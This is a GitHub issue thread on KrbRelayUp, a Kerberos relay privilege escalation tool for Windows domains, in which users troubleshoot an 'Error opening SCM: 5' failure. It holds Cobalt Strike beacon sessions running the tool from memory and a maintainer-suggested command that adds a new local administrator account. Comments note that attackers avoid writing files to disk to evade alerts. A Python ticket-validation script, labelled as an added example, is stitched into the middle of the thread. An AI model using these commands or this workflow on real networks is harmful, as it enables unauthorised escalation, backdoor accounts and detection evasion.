Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

Error opening SCM: 5 #10

Open frbor opened 2 years ago

frbor commented 2 years ago

When I run the tool I get the error Error opening SCM: 5:

[screenshot: krbrelayup-scm-5]

Do you have any idea what blocks this?

It looks like OpenSCManager fails https://github.com/Dec0ne/KrbRelayUp/blob/6564f0fbae1a8dc2fbf9232263e8b29cb8e2d5da/KrbRelayUp/KrbSCM.cs#L56 but not sure what can cause this?

For reference, when running the same command as administrator it runs without any error.

c0pp3r commented 2 years ago

I am actually having the same exact issue in a brand new detectionlab environment in azure. Everything works fine until that step and I get the same SCM: 5

Dec0ne commented 2 years ago

Can you confirm that the high priv ticket was imported? (Use klist command) If so, try to run krbrelayup.exe krbscm after getting this error and making sure that the ticket is indeed in klist. Let me know if that helps.

frbor commented 2 years ago

Thanks for replying to this issue!

I confirm that I have a ticket which I can find using klist:

Cached Tickets: (1)

#0>     Client: Administrator @ (...)

Using KrbRelayUp.exe krbscm however, I get the same error:

KrbRelayUp.exe krbscm -s test-test2
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[-] Error opening SCM: 5
c0pp3r commented 2 years ago

I have just confirmed the same thing as well!

beacon> shell klist
[*] Tasked beacon to run: klist
[+] host called home, sent: 36 bytes
[+] received output:

Current LogonId is 0:0x363b460

Cached Tickets: (1)

0> Client: Administrator @ WINDOMAIN.LOCAL

Server: HOST/WIN10 @ WINDOMAIN.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize 
Start Time: 5/10/2022 12:36:16 (local)
End Time:   5/10/2022 22:36:16 (local)
Renew Time: 5/17/2022 12:36:16 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0 
Kdc Called: 

beacon> execute-assembly /Library/Tools/KrbRelayStuff/KrbRelayUp.exe krbscm
[*] Tasked beacon to run .NET program: KrbRelayUp.exe krbscm
[+] host called home, sent: 481847 bytes
[+] received output:
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00000000
[-] Error opening SCM: 5
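The maintainer's first troubleshooting step above is "check klist for the high-priv ticket". The script below is an added example (not part of KrbRelayUp and not posted by anyone in this thread) that automates that check: paste the output of `klist` from the target host into it and it confirms that a ticket for the expected client (Administrator by default) to HOST/<machine> is cached and still within its validity window before you run `krbrelayup.exe krbscm`. The sample klist text is constructed, modeled on the output posted above; `SAMPLE_KLIST`, `parse_klist`, `find_usable_ticket` and `precheck` are this example's own names. As the thread shows, a cached ticket is necessary but not sufficient: the reporters still get `Error opening SCM: 5` with the ticket present, so a passing precheck only rules out the "ticket was never imported" cause.

```python
"""Pre-flight check for the KrbRelayUp krbscm step: parse `klist` output and
confirm the relayed high-privilege ticket is cached and valid.
Added example, not KrbRelayUp code."""
import re
from datetime import datetime

# Constructed sample, modeled on the klist output posted in this thread.
SAMPLE_KLIST = """\
Current LogonId is 0:0x363b460

Cached Tickets: (1)

#0>     Client: Administrator @ WINDOMAIN.LOCAL
        Server: HOST/WIN10 @ WINDOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 5/10/2022 12:36:16 (local)
        End Time:   5/10/2022 22:36:16 (local)
        Renew Time: 5/17/2022 12:36:16 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
"""

# "#0>     Client: ..." from klist, or "0> Client: ..." as relayed through a C2 console.
TICKET_START = re.compile(r"^#?(\d+)>\s*Client:\s*(.+?)\s*$")
# "Ticket Flags" has no colon in klist output, so the colon is optional.
FIELD = re.compile(r"^(Server|Start Time|End Time|Ticket Flags):?\s*(.*?)\s*$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def _parse_time(value):
    """klist prints e.g. '5/10/2022 12:36:16 (local)'; drop the suffix and parse."""
    return datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)


def parse_klist(text):
    """Return a list of dicts, one per cached ticket, with the fields we care about."""
    tickets = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        m = TICKET_START.match(line)
        if m:
            cur = {"index": int(m.group(1)), "client": m.group(2)}
            tickets.append(cur)
            continue
        if cur is None:
            continue
        f = FIELD.match(line)
        if not f:
            continue
        key, value = f.group(1), f.group(2)
        if key == "Server":
            cur["server"] = value
        elif key == "Ticket Flags":
            cur["flags"] = value.split("->")[0].strip()
        elif key == "Start Time":
            cur["start"] = _parse_time(value)
        elif key == "End Time":
            cur["end"] = _parse_time(value)
    return tickets


def find_usable_ticket(tickets, client_user, server_spn, now):
    """First ticket whose client and server SPN match (realm ignored, case-insensitive)
    and whose validity window contains `now`; None if there is no such ticket."""
    for t in tickets:
        client = t["client"].split("@")[0].strip().lower()
        server = t.get("server", "").split("@")[0].strip().lower()
        if client != client_user.lower() or server != server_spn.lower():
            continue
        if t.get("start") is None or t.get("end") is None:
            continue  # cannot verify validity; do not report it as usable
        if t["start"] <= now <= t["end"]:
            return t
    return None


def precheck(klist_text, hostname, now, client_user="Administrator"):
    """(ok, reason): is a valid <client_user> -> HOST/<hostname> ticket cached?"""
    tickets = parse_klist(klist_text)
    if not tickets:
        return False, "no tickets cached; the relay/ticket import step did not succeed"
    spn = f"HOST/{hostname}"
    t = find_usable_ticket(tickets, client_user, spn, now)
    if t is None:
        seen = ", ".join(f"{x['client']} -> {x.get('server', '?')}" for x in tickets)
        return False, f"no valid {client_user} ticket for {spn}; cached: {seen}"
    return True, f"ticket #{t['index']} {t['client']} -> {t['server']} valid until {t['end']}"


if __name__ == "__main__":
    ok, why = precheck(SAMPLE_KLIST, "WIN10", datetime(2022, 5, 10, 15, 0, 0))
    print("OK" if ok else "FAIL", why)
```

In practice you would feed it `klist` output captured from the host (for example `klist > klist.txt` and `precheck(open("klist.txt").read(), socket.gethostname(), datetime.now())`); the hostname in the SPN must be the machine you are escalating on, which is why the check takes it as a parameter rather than guessing.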

vysecurity commented 2 years ago

Same, having this error.

Dec0ne commented 2 years ago

When using the tool from memory you have to specify --ServiceCommand since the default will be "{ToolPathOnDisk} system {DesktopSessionToSpawnCmdIn}" (i.e. C:\Tools\KrbRelayUp.exe system 1) and since it's not on disk the service will fail upon execution. Try specifying --ServiceCommand "cmd.exe /c net user test QWERTY123 /add && net localgroup administrators test /add" for example.

vysecurity commented 2 years ago

Wonder if you've had a look at the U2U escalation using user account? @Dec0ne

frbor commented 2 years ago

Not sure if the comment above was related to this issue (since the tool is on disk), but I tried with --ServiceCommand argument as specified, and that did not help.

c0pp3r commented 2 years ago

@Dec0ne I've been using the service command to execute a new instance of the beacon I dropped on disk. I also tried the new localgroup command you posted above and got the same result I posted previously.

vysecurity commented 2 years ago

Same, I've always used the sc command. We don't really use the spawn CMD thing because we don't drop files on disk as it could raise alerts easier.

naksyn commented 2 years ago

Same here, the issue for me is arising when I run from memory.

mc-0815 commented 1 year ago

Hi,

I have exactly the same issue.

When debugging the network traffic I recognized that the RPC bind request ends up with a bind_nak response and the error code "Invalid checksum", whose meaning according to the MS-RPCE documentation (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/6f81bffe-8fce-498a-addf-94654a57b329) is "This rejection code is used when an unrecoverable error is detected by the underlying security package."

The ticket is in the cache and the user has local admin privilege. However, the SCMUACBypass part seems to fail for an unknown reason.

Is anyone aware of a specific (hardening) configuration that would prevent leveraging the ticket locally via SCMUACBypass?

Any ideas would be very appreciated. Thanks.